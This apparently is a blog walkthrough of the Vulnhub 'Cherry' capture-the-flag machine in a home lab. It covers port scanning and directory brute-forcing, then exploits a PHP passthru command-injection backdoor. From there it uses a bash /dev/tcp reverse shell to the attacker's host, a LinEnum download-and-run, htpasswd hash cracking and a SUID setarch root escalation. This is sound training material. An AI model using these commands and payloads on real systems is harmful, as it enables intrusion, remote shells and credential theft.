After my frustratingly fun adventure with Vulnhub’s Chili image, I decided to continue along and try another image from the SunCSR Team. The next image I found that was considered easy was Cherry. No hint this time. Sounds like a good time, doesn’t it? Let’s dive in!
After discovering the IP address of my VM (192.168.1.39), I went to work running an nmap scan of the target system.
sudo nmap -sT -sC -sV -O -p- 192.168.1.39
Two web servers, OpenSSH, and “mysqlx?”.
The nginx server is running on port 80, while the Apache server is running on 7755.
This is an abnormal port and would not have been picked up by a basic network scan.
Glad I used -p- to scan all ports, otherwise I would have missed this.
Both nginx and Apache seem to be very up to date, so I don’t think there will be any public exploits. OpenSSH is up to date as well. Let’s check out the main web server running on port 80.
The nginx Web Server⌗
The main website revealed nothing spectacular or interesting: a large image of some cherries. Just like with Chili, there were no obvious web exploit vectors I could see from the main page.
Time to fire up gobuster and see if there’s something we can uncover.
gobuster dir -u 192.168.1.39 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
There’s a directory called /backup we can access.
Going to the URL rejects us with a 403 Forbidden page. That’s a shame….
Remember there was another web server running on a different port?! Okay let’s check that out!
The Apache Web Server⌗
Going to 192.168.1.39:7755 reveals the same basic page with nothing to go on.
This makes me wonder if both web servers are sharing the same web-root.
What if we try going to /backup on the Apache server?
We have access to the “forbidden” directory! There are four files in there:
Let’s grab the loot and we can start some investigation.
mkdir -p ~/Documents/vulnhub/cherry
cd ~/Documents/vulnhub/cherry
for file in command.php latest.tar.gz master.zip master.zip.bak; do curl -s -O 192.168.1.39:7755/backup/$file; done
ls -l
-rw-r--r-- 1 kali kali      252 Sep 21 19:45 command.php
-rw-r--r-- 1 kali kali 12983648 Sep 21 19:45 latest.tar.gz
-rw-r--r-- 1 kali kali 11898973 Sep 21 19:45 master.zip
-rw-r--r-- 1 kali kali 11898973 Sep 21 19:45 master.zip.bak
What are these backup files?⌗
I spent quite a bit of time going through these.
I get it, the command.php is probably screaming at you. Let me just say, something I’ve learned is to not rush into anything. You can fall down a rabbit hole very quickly that way and may end up retreating.
latest.tar.gz⌗
Extract this archive using tar xzvf latest.tar.gz
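If you prefer to peek inside an archive before (or after) extracting it, tar can list its contents without touching the disk. A minimal sketch, assuming the archive name matches the one pulled from /backup:

```shell
# Sketch: list a tarball's contents instead of extracting it blindly.
# t = list, z = gzip, f = file; guard against the file not being present.
if [ -f latest.tar.gz ]; then
  tar tzf latest.tar.gz | head -n 5
fi
```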
This produced a folder called wordpress that contained everything you would need to get your blog going. But WordPress requires a database, and there was mysqlx? running on the server. Perhaps there’s a config file in there with some database credentials. Unfortunately, it was a vanilla release from WordPress with nothing set up.
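Checking for a configured install is quick: a vanilla WordPress drop only ships wp-config-sample.php with placeholder values, while a configured one has a wp-config.php with real DB_PASSWORD and friends (those are standard WordPress names, not something specific to this box). A rough sketch:

```shell
# Sketch: hunt for database credentials in an extracted WordPress tree.
# A vanilla download only has wp-config-sample.php with placeholders.
ls wordpress/wp-config* 2>/dev/null
grep -rn "DB_PASSWORD" wordpress/ 2>/dev/null | head -n 5
```

If all you get back is the sample file and 'password_here', nothing was ever set up.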
master.zip & master.zip.bak⌗
Let’s unzip both these files and check out what they contain. Since one is a backup of the other, I’ll move them so I can work with both in the same directory.
unzip master.zip
mv piranha.core master
unzip master.zip.bak
mv piranha.core master-bak
After some quick google-fu, I came across Piranha CMS. Something from the .NET Foundation. This is probably nothing. I ran a quick comparison to see if there was anything different between the backup and the current.
diff -r master master-bak/
Nothing, so they contain the same files.
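The diff settles it, but hashing the archives directly is an even cheaper way to confirm two files are byte-identical (the matching sizes in the earlier ls -l output hinted at this too). A quick sketch:

```shell
# Sketch: byte-identical files always produce identical digests.
if [ -f master.zip ] && [ -f master.zip.bak ]; then
  md5sum master.zip master.zip.bak
fi
```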
A quick look through the master folder revealed nothing. Another vanilla download.
Let’s check out command.php. Running cat on the file reveals the following juicy nugget:
<!-- <?php echo passthru($_GET['backup']); ?> -->
Occam’s razor, right?
The simpler answer was correct.
It’s been a while since my PHP days, but I know that $_GET['backup'] will pull the value of the GET parameter backup from the URL. Then it gets passed into passthru.
According to the PHP manual:
passthru — Execute an external program and display raw output
That sounds lovely!
Let’s run a quick ls test in our web browser by going to http://192.168.1.39:7755/backup/command.php?backup=ls
Excellent! We can execute commands through our web browser on the remote system. Time to exploit the machine!
Exploitation - Local Shell⌗
We have a crack in the armor, how can we leverage this to get a shell on the system? There’s a chance some files are exposed through this, but it would be tedious to traverse the entire system.
A Quick Enumeration⌗
The first thing I went for was /etc/passwd. Maybe we can try to crack a password and SSH into the system.
HINT: When using the web browser, the output is not formatted nicely. If you start looking at files and executing commands it can be a pain to work with. Leverage Firefox’s view-source URL scheme to view it pretty-printed. For example: view-source:http://192.168.1.39:7755/backup/command.php?backup=ls …or you can just use curl from the terminal.
Running cat /etc/passwd through the vulnerability we found confirms some of the suspicions from earlier.
There’s a user called www-dir, along with a mysql user and group.
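Running commands through a browser gets old fast, so a small curl wrapper is handy. A minimal sketch, assuming the same lab IP as above (the run_cmd helper name is mine, not from the box): curl’s -G flag moves the data into the query string, and --data-urlencode takes care of encoding awkward characters for us.

```shell
# Sketch: wrap the command.php vulnerability in a tiny shell helper.
# TARGET is this lab's VM; change it to match your own network.
TARGET="192.168.1.39:7755"

run_cmd() {
  # -G puts the data in the query string; --data-urlencode handles
  # the URL encoding, so spaces and quotes are no problem.
  curl -s -G --max-time 5 "http://$TARGET/backup/command.php" \
       --data-urlencode "backup=$1"
}

run_cmd "cat /etc/passwd" || echo "target not reachable from here"
```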
During my enumeration I also tried a which nc to see if netcat was available. So I quickly tried to run a bind shell using nc -lnvp 4444 -e /bin/bash.
The page loaded instantly.
If it was successful, the page would have hung in a loading state, waiting for the command to finish.
This is most likely because the version of nc installed on the Ubuntu system is the OpenBSD netcat, which removes netcat’s gaping security hole (the -e flag). Had to try.
Let’s try something else.
I used a dead simple PHP reverse shell when exploiting Chili, could I use it again? Looking at its source code, and removing the PHP part of it, the core of it executes a bash reverse shell one-liner. Since we can run any command we want from the URL, let’s take that and plug it in as the backup GET parameter.
192.168.1.39:7755/backup/command.php?backup=/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1'
If you’re following along, make sure to change 192.168.1.39 to your Cherry VM IP address and change 192.168.1.10 to your Kali machine IP address. Also, make sure to fire up a netcat listening server on your Kali machine!
nc -lnvp 4444
Page loads instantly. Damn!
There’s a lot of & in there, and that’s not great for URLs!
You can use an online URL encoder to transform it into something more usable for web browsers. Make sure to just URL encode the command and paste it at the end of your URL.
So now our URL looks like:
192.168.1.39:7755/backup/command.php?backup=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.10%2F4444%200%3E%261%27
A lot of garbage, but put that in your browser…
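If you’d rather not paste payloads into a random website, the encoding can be done locally. A sketch using python3’s standard urllib.parse (python3 is just what tends to be on Kali; any encoder works):

```shell
# Sketch: URL-encode the reverse shell payload locally instead of
# using an online encoder. safe='' makes quote() encode '/' as well.
python3 -c "import urllib.parse; print(urllib.parse.quote(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1'\", safe=''))"
```

The output is the same percent-encoded string you would paste after backup= in the URL.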
I ran an automated Linux enumeration script: rebootuser/LinEnum.
cd /tmp
curl -O https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh -e /tmp
This was my first time using this script. There is a lot to go through from the results of this script. I’ll focus on the important pieces that came up. However, if you want to check out the results in its entirety, move the saved file to the web-root and download a copy.
[-] htpasswd found - could contain passwords:
/etc/apache2/.htpasswd
admin:$apr1$3SRFNcco$BUX4Qy6xh58F03LDqnPsW/

[-] /etc/init/ config file permissions:
total 12
drwxr-xr-x  2 root root 4096 Sep  7 02:36 .
drwxr-xr-x 97 root root 4096 Sep  7 04:14 ..
-rw-r--r--  1 root root 1757 Nov  6  2019 mysql.conf

[+] Possibly interesting SUID files:
-rwsr-sr-x 1 root root 27136 Apr  2 15:29 /usr/bin/setarch
The admin password can easily be cracked with john, but I’ll leave that to the reader to solve.
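For the curious, the rough shape of that crack looks like this. The hash is the one LinEnum surfaced ($apr1$ is Apache’s md5crypt variant, which john autodetects), and /usr/share/wordlists/rockyou.txt is the usual Kali wordlist path:

```shell
# Sketch: crack the htpasswd entry LinEnum found (apr1/md5crypt format).
echo 'admin:$apr1$3SRFNcco$BUX4Qy6xh58F03LDqnPsW/' > htpasswd.hash

# john autodetects the hash type; point it at a wordlist such as rockyou.
if command -v john >/dev/null; then
  john --wordlist=/usr/share/wordlists/rockyou.txt htpasswd.hash
  john --show htpasswd.hash
fi
```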
The most striking piece was the SUID and SGID files. What are they, you ask? I suggest you read up more about SUID and SGID permissions. Long story short though, they can be abused.
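The manual equivalent of what LinEnum just did is a one-liner: SUID corresponds to the 04000 permission bit and SGID to 02000, and find can hunt for either. A sketch:

```shell
# Sketch: enumerate SUID (-4000) and SGID (-2000) binaries by hand.
# The parentheses keep the OR from swallowing the -type test;
# sorting also makes repeated runs easy to diff.
find / \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null | sort
```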
Exploitation - Root Shell⌗
If you happen to find strange SUID or SGID files on a system, always check out GTFOBins to see if they can be used to get a root shell. Sure enough, GTFOBins has an entry for setarch.
Let’s run the command provided in the documentation.
setarch $(arch) /bin/sh -p
Just a blank screen. Did it work? Always check with whoami.
Excellent! To grab the flag:
whoami
root
cd /root
ls
proof.txt  snap
cat proof.txt
Sun_CSR_TEAM.af6d45da1f1181347b9e2139f23c6a5b
Okay, I really enjoyed this one.
There were a lot of misdirects and ways to try and trip you up.
If this were a real engagement, I feel there would have been a lot of extra effort to try and get the MySQL data.
But in this CTF style, I had a solid focus on getting root.
Looking forward to the next one!